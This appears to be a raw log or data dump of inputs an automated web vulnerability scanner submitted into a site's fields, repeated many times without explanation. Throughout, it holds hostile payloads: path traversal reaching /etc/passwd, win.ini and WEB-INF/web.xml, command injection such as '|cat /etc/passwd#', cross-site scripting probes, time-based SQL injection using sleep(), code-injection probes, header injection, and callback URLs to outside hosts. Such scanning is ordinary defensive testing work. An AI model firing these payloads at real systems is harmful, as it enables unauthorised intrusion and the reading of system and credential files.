../../../../../../../../../../etc/passwd.jpg

1

${99274+100465}

1

1

`cat /etc/passwd`

1

-1)

1<img/src=">" onerror=alert(943620)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1

'|'ld

-1))

1<ScRiPt%20>prompt(990146)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n999029=v910792

)

1some_inexistent_file_with_long_name%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

c4v4W4fw'

"|"ld

!(()&&!|*|*|

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Kh6knCcw')

\xf6<img acu onmouseover=prompt(945948) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

1

'"()

'

/etc/passwd

testasp.vulnweb.com

1

'

1<input autofocus onfocus=prompt(983601)>

GVMDPdis'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitnfUNTwXl1N.bxss.me/

&dir

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_oNR3w <ScRiPt >prompt(920730)</ScRiPt>

1

acunetix_wvs_invalid_filename

1

z5ru2fJ1'

'&dir&'

1

file:///etc/passwd

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

cNS7bRVx')

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

wfLYe6e8'))

1

1

http://www.acunetix.tst

1

'"

|dir

1

comments/.

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(963550)</ScRiPt>

<!--

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(997305)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

"|dir

1

1_987968

1

1

../../../../../../../../../../windows/win.ini

1

acu10467\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10467

1

1

../../../../../../../../../../boot.ini

1

1

acux7638\xc0\xbez1\xc0\xbcz2a\x90bcxuca7638

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(916926)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(966299)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(984015)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900952></ScRiPt>

1

1

1

1<ScRiPt >prompt(911993)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(961991)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932717)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(910458))>

1

1<iframe src='data:text/html

1

response.write(9288249*9228037)

1

1

1

WEB-INF/web.xml

1<body onload=prompt(960850)>

1

'+response.write(9288249*9228037)+'

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961428)>

1

1

1

&cat /etc/passwd&

"+response.write(9288249*9228037)+"

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(932770)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

'&cat /etc/passwd&'

1

1

1<img/src=">" onerror=alert(956624)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(919806)</sCripT>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1&lt

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

cat /etc/passwd

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(914493) //\xf6>

${100167+100492}

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<input autofocus onfocus=prompt(951033)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n985020=v913483

|cat /etc/passwd#

2l52HzoE'

1

1

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

)

TglAZfKF')

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

kP3cG0qH'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

-1

'

testasp.vulnweb.com

1_qvR4w <ScRiPt >prompt(908303)</ScRiPt>

/etc/passwd

1

1

1

1

"

-1)

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

AzvJR0tZ'

acunetix_wvs_invalid_filename

||cat /etc/passwd

http://hitmGhDBWYjcp.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

F0uDT1HB')

1

1

comments

1

1

1

1

&dir

OTDVspaF'))

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

'&dir&'

1

1

'"

1

1'"()&%<ScRiPt >prompt(989813)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

"&dir&"

WEB-INF/web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(907333)</ScRiPt>

|dir

1

1

WEB-INF\web.xml

1

1_945302

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

acu3917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3917

1

"|dir

../../../../../../../../../../boot.ini

acux4456\xc0\xbez1\xc0\xbcz2a\x90bcxuca4456

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(965408)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(918500)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(959573)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973803></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(900385)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(949990)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952145)"></g></svg>

response.write(9449221*9888493)

1

1<div style=width:expression(prompt(967653))>

1

1

1

WEB-INF/web.xml

'+response.write(9449221*9888493)+'

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(915639)>

"+response.write(9449221*9888493)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979308)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(970072)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img/src=">" onerror=alert(919011)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

1

1<ScRiPt%20>prompt(986000)</sCripT>

1

1

`cat /etc/passwd`

${99290+99498}

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

|cat /etc/passwd#

1&lt

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1YLa50iV'

1

\xf6<img acu onmouseover=prompt(987950) //\xf6>

'|'ld

1

1&n999654=v908929

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

syV64ZIq')

1

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(915899)>

testasp.vulnweb.com

1

"|"ld

HwRM96sI'))

<a href='http://www.acunetix.com'>website security</a>

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

'"()

1

[url=http://www.acunetix.com]website security[/url]

1

^(#$!@#$)(()))******

/etc/passwd

1

-1)

1_9VUrx <ScRiPt >prompt(979472)</ScRiPt>

'

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

"

"

1

1

1

||cat /etc/passwd

LiBs0dsZ'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hit3I9bm1Daja.bxss.me/

1

&dir

k3iX4EFC')

1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

wVXImCVN'))

1

'&dir&'

1

file:///etc/passwd

http://www.acunetix.tst

1

comments

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(907052)</ScRiPt>

1

1

comments

1

<!--

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(978161)</ScRiPt>

|dir

1

1

1

1

comments/.

WEB-INF\web.xml

1

1

'|dir

1_913920

1

../../../../../../../../../../windows/win.ini

1

1

1

acu4694\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4694

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4676\xc0\xbez1\xc0\xbcz2a\x90bcxuca4676

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(993767)</ScRiPt>

1

1

1

1

1

................windowswin.ini

1<script>prompt(901763)</script>

1

1

1

1<ScRiPt >prompt(943837)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975572></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(950550)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986685)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925485)"></g></svg>

1

1

1<div style=width:expression(prompt(908754))>

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

1

1

1<body onload=prompt(965822)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982383)>

1

1

1

1<img src=xyz OnErRor=prompt(940521)>

1

1

1<img/src=">" onerror=alert(966170)>

1

1<ScRiPt%20>prompt(973039)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(953251) //\xf6>

1

1

1<input autofocus onfocus=prompt(912593)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_WnUHE <ScRiPt >prompt(960326)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9616504*9152144)

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9616504*9152144)+'

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9616504*9152144)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

-1

1

-1)

1

${99140+100186}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n972198=v977119

|cat /etc/passwd#

1

-1))

)

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

0WgY2SR7'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

'

testasp.vulnweb.com

K6NrmKv8')

^(#$!@#$)(()))******

1

"

/etc/passwd

1

1

1

02eYKLUE'))

1

'

http://hitj3sGN8X0PH.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

-1)

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

'"

1

tZG2OgLA'

comments/.

'&dir&'

1

1'"()&%<ScRiPt >prompt(922950)</ScRiPt>

K2VS25Og')

1

<!--

file:///etc/passwd

'"()&%<ScRiPt >prompt(956929)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

TP0VzBwJ'))

1

|dir

1_910342

WEB-INF/web.xml

1

1

1

1

acu5837\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5837

WEB-INF\web.xml

'|dir

1

1

"|dir

../../../../../../../../../../windows/win.ini

acux2356\xc0\xbez1\xc0\xbcz2a\x90bcxuca2356

1

1

1

1<ScRiPt >prompt(989370)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(997295)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(959991)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(948050)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(966979)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966336)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9619770*9147549)

1<div style=width:expression(prompt(976001))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9619770*9147549)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9619770*9147549)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(996828)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965262)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1<img src=xyz OnErRor=prompt(908638)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

${99134+100499}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(948281)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1))

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(964002)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

vsUnR41m'

1&n961941=v920259

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

1

testasp.vulnweb.com

"|"ld

OGM61qIi')

)

\xf6<img acu onmouseover=prompt(980628) //\xf6>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

3TWekHaY'))

1

'"()

1<input autofocus onfocus=prompt(918680)>

'

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

'

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1_DfwvQ <ScRiPt >prompt(978037)</ScRiPt>

1

http://hitt3W3oukI5k.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

vlQiJ2my'

1

1

1

1

1

'&dir&'

http://www.acunetix.tst

1

1

Pja3LFrm')

comments

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(904713)</ScRiPt>

'"

"&dir&"

1

k6wMT8CX'))

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(957674)</ScRiPt>

WEB-INF/web.xml

1

1

1

1_929590

'|dir

1

1

1

1

WEB-INF\web.xml

1

1

acu3722\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3722

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

acux6547\xc0\xbez1\xc0\xbcz2a\x90bcxuca6547

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(920741)</ScRiPt>

1

1

1

1<script>prompt(996207)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(907642)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963548></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(938945)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(919586)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9597697*9151146)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915571)"></g></svg>

1

'+response.write(9597697*9151146)+'

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(970834))>

1

1

'&cat /etc/passwd&'

1

"+response.write(9597697*9151146)+"

1<iframe src='data:text/html

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1<body onload=prompt(991021)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927352)>

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(987729)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

-1)

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(922758)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${99576+100219}

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n990252=v962426

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928282)</sCripT>

1

awfzGyzZ'

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

N1sPNx75')

)

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(943900) //\xf6>

!(()&&!|*|*|

hT7jjNxm'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(910567)>

'"()

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

testasp.vulnweb.com

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

-1)

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_Se0xV <ScRiPt >prompt(954703)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hit2KNRUGwagq.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

M2VNzVt0'

1

1

1

1

comments

1

U3zdj5gA')

&dir

1

comments

1

file:///etc/passwd

1

1

1

1

'&dir&'

5i6zMjk1'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(923939)</ScRiPt>

1

1

1

1

|dir

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(998422)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1_983265

"|dir

../../../../../../../../../../boot.ini

1

1

1

1

acu7856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7856

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5468\xc0\xbez1\xc0\xbcz2a\x90bcxuca5468

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(907390)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(992293)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992783)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994488></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(945572)</ScRiPt>

response.write(9674573*9358797)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'+response.write(9674573*9358797)+'

1<video><source onerror="javascript:prompt(950211)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

&cat /etc/passwd&

"+response.write(9674573*9358797)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910163)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(934615))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1

